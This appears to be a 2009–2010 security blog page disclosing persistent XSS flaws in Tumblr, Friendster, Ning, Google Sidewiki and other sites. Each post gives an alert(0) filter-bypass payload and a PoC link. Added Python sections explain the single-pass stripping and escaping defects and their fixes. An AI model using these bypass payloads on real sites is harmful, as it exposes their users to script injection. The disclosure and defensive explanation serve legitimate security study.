This site is soon to be deprecated by http://www.johnleitch.net
Showing posts with label type 2 xss. Show all posts

Saturday, May 8, 2010

Tumblr.com Persistent XSS

onmouseover attributes added to user-submitted markup via an HTTP proxy are not stripped.

Exploit: Create a new link, add a description, and set the HTML to <h1>test</h1>. Submit the form and capture the request using an HTTP proxy (e.g. Fiddler). Change the post[three] value to <h1 onmouseover="alert(0)">test</h1> and resume the request.

PoC: http://asdfffffffff.tumblr.com/

Thursday, May 6, 2010

Friendster.com Persistent XSS

Only one sanitization pass is performed on user-submitted data.

Exploit: <<z>script>alert(0)<<z>/script>

PoC: http://profiles.friendster.com/31202727

Sunday, May 2, 2010

Friendster.com Persistent XSS

Data submitted via the album description and a few other fields is not properly escaped before being rendered into JavaScript.

Exploit: \";alert(0);//

PoC: http://www.friendster.com/viewalbums.php?uid=120927091
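The escaping mistake behind this one is worth seeing concretely. Below is an added example, not code from the original post or from Friendster: a constructed template drops a user field into a JavaScript string and escapes only the double quote. A user-supplied backslash cancels the backslash the escaper inserts, so the quote closes the string and the rest of the value is parsed as code. Building the literal with json.dumps, which escapes the backslash as well, keeps the entire value inside the string. The function names and the var albumDescription template are assumptions about how such a page is rendered, not anything taken from the site.

```python
import json

# Constructed sample: the break-out string quoted above, as a Python literal.
# It is the 14-character sequence  \";alert(0);//
PAYLOAD = '\\";alert(0);//'


def naive_js_string(value: str) -> str:
    """Escape only double quotes. This is the defect: a backslash supplied by the
    user survives and neutralises the backslash the escaper inserts."""
    return '"' + value.replace('"', '\\"') + '"'


def safe_js_string(value: str) -> str:
    """Build a JavaScript string literal with json.dumps, which escapes the
    backslash itself as well as the quote. The extra replaces matter only
    because the literal sits inside an inline <script> block: "</" must not
    be able to close the script element, and U+2028/U+2029 are line
    terminators in older engines (json.dumps already escapes them while
    ensure_ascii is on; the replace keeps that true if it is ever turned off)."""
    literal = json.dumps(value)
    return (literal.replace("</", "<\\/")
                   .replace("\u2028", "\\u2028")
                   .replace("\u2029", "\\u2029"))


def literal_end(js: str) -> int:
    """Index of the quote that closes the double-quoted literal at js[0],
    following JavaScript's rule that a backslash escapes the next character.
    Returns -1 if the literal never closes."""
    i = 1
    while i < len(js):
        if js[i] == "\\":
            i += 2          # skip the escaped character
        elif js[i] == '"':
            return i
        else:
            i += 1
    return -1


def trailing_code(js: str) -> str:
    """Whatever a JavaScript parser would see after the literal ends.
    Empty means the whole value stayed inside the string."""
    end = literal_end(js)
    return js[end + 1:] if end != -1 else ""


def render_album_description(value: str, escaper) -> str:
    """Constructed stand-in for a template that embeds a user field in script."""
    return "var albumDescription = " + escaper(value) + ";"


if __name__ == "__main__":
    for name, esc in (("naive", naive_js_string), ("json", safe_js_string)):
        print(f"{name:5} -> {render_album_description(PAYLOAD, esc)}")
        print(f"       code after the literal: {trailing_code(esc(PAYLOAD))!r}")
```

The check in trailing_code is the practical test to run against any escaper used for a script context: if anything at all follows the closing quote, the field has become code.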

Monday, April 26, 2010

Ning.com Persistent XSS

Less-than and greater-than characters submitted in the descriptions of albums, images and probably other fields are not encoded. Tags submitted in such fields are subject to whitelist validation, but this can be bypassed by prepending a less-than character to the injected open and close tags.

Exploit: <<script>alert(0)//<</script>

PoC: http://coniferous.ning.com/photo/792231134-1

Monday, November 2, 2009

Free Rein - MLive.com

MLive's profile system has no XSS protection. HTML of any sort can be entered in the About Me field.

http://connect.mlive.com/user/XSSBlog/index.html

Wednesday, September 30, 2009

Persistent XSS Vulnerability - Google.com

Here's a good one: Google Sidewiki has a type 2 XSS vulnerability. When editing an entry (and possibly when adding one; I didn't test it), an HTTP proxy such as Fiddler can be used to alter the pagetitle field.

The code replacing the pagetitle value is as follows.
<<a>a onmouseout=alert(0)>a

The a tag is stripped out, but because only one pass is performed, removing it leaves behind a new a tag.
<a onmouseout=alert(0)>a

The result is a profile containing the arbitrary code.

http://www.google.com/profiles/108489460074237220044?hl=en#sidewiki
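The Friendster post from May 6 and this Sidewiki post describe the same defect: a filter that strips disallowed tags in exactly one pass, so a tag planted inside another tag's brackets reassembles once the outer one is removed. The following is an added example, not code from the original post or from any site named here. It uses a toy regex allowlist filter (the allowlist is an assumption; the payload strings are the ones quoted in the two posts) to show the reassembly pass by pass, then the two defensive answers: iterate the filter until the output stops changing, and, for fields that never needed markup, encode the value instead of filtering it.

```python
import html
import re

# Assumed allowlist for the toy sanitizer; any other tag is removed.
ALLOWED_TAGS = {"b", "i", "em", "strong", "p", "br"}

# An opening or closing tag: "<", optional "/", a name, anything up to the next ">".
TAG_RE = re.compile(r"<(/?)([a-zA-Z][a-zA-Z0-9]*)[^>]*>")

# Constructed from the payloads quoted in the posts above.
FRIENDSTER_PAYLOAD = "<<z>script>alert(0)<<z>/script>"
SIDEWIKI_PAYLOAD = "<<a>a onmouseout=alert(0)>a"


def strip_disallowed_once(markup: str) -> str:
    """A single stripping pass, the behaviour the posts describe. Removing a tag
    joins the characters on either side of it, which can form a new tag."""
    def keep_or_drop(m):
        return m.group(0) if m.group(2).lower() in ALLOWED_TAGS else ""
    return TAG_RE.sub(keep_or_drop, markup)


def stripping_passes(markup: str, max_rounds: int = 10) -> list:
    """Every intermediate result, so the reassembly is visible pass by pass.
    Stops when a pass changes nothing (a fixpoint) or after max_rounds."""
    history = [markup]
    for _ in range(max_rounds):
        nxt = strip_disallowed_once(history[-1])
        if nxt == history[-1]:
            break
        history.append(nxt)
    return history


def strip_until_stable(markup: str, max_rounds: int = 10) -> str:
    """Narrow fix for the one-pass bug: iterate to a fixpoint. If the output is
    still changing after max_rounds, fail closed and encode it instead."""
    last = stripping_passes(markup, max_rounds)[-1]
    if strip_disallowed_once(last) != last:
        return html.escape(last)
    return last


def render_untrusted(value: str, allow_markup: bool = False) -> str:
    """Preferred default: encode. Only fields that genuinely need markup go
    through the (iterated) tag filter at all."""
    return strip_until_stable(value) if allow_markup else html.escape(value)


if __name__ == "__main__":
    for payload in (FRIENDSTER_PAYLOAD, SIDEWIKI_PAYLOAD):
        for n, step in enumerate(stripping_passes(payload)):
            print(f"pass {n}: {step}")
        print(f"encoded: {render_untrusted(payload)}\n")
```

Iterating to a fixpoint only closes the specific hole these posts describe. Regex filters have other failure modes, so a field that really must accept markup should go through a parser-based sanitizer that builds a tree and re-serializes only allowed elements and attributes; everything else should be encoded on output.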

Friday, September 25, 2009

Persistent XSS Vulnerability - IntenseDebate.com

The profile description field of Intense Debate has a type 2 XSS vulnerability. Using it, arbitrary code can be run when the affected profile is viewed or when the mouse cursor is over the avatar shown next to comments posted by the account.

<a style="position:absolute;top:-500px;left:-500px;width:9999px;height:9999px;" onmouseover="alert(0)"></a>

http://intensedebate.com/people/JohnnyCake5

http://www.woodtv.com/dpp/your_money/wall_street/Stocks_End_Low_As_Healthcare_Recovers_2887663#IDComment35942133

Saturday, September 19, 2009

Persistent XSS Vulnerability - AssociatedContent.com

Several fields of the Associated Content profile system have persistent XSS vulnerabilities. Such a vulnerability could be used to craft a rather nasty worm.

The code shown in the screenshots is as follows:

"style="position:absolute;top:0;left:0;width:9999px;height:9999px;"onmouseover="alert(0)

http://www.associatedcontent.com/user/631547/xss_blog.html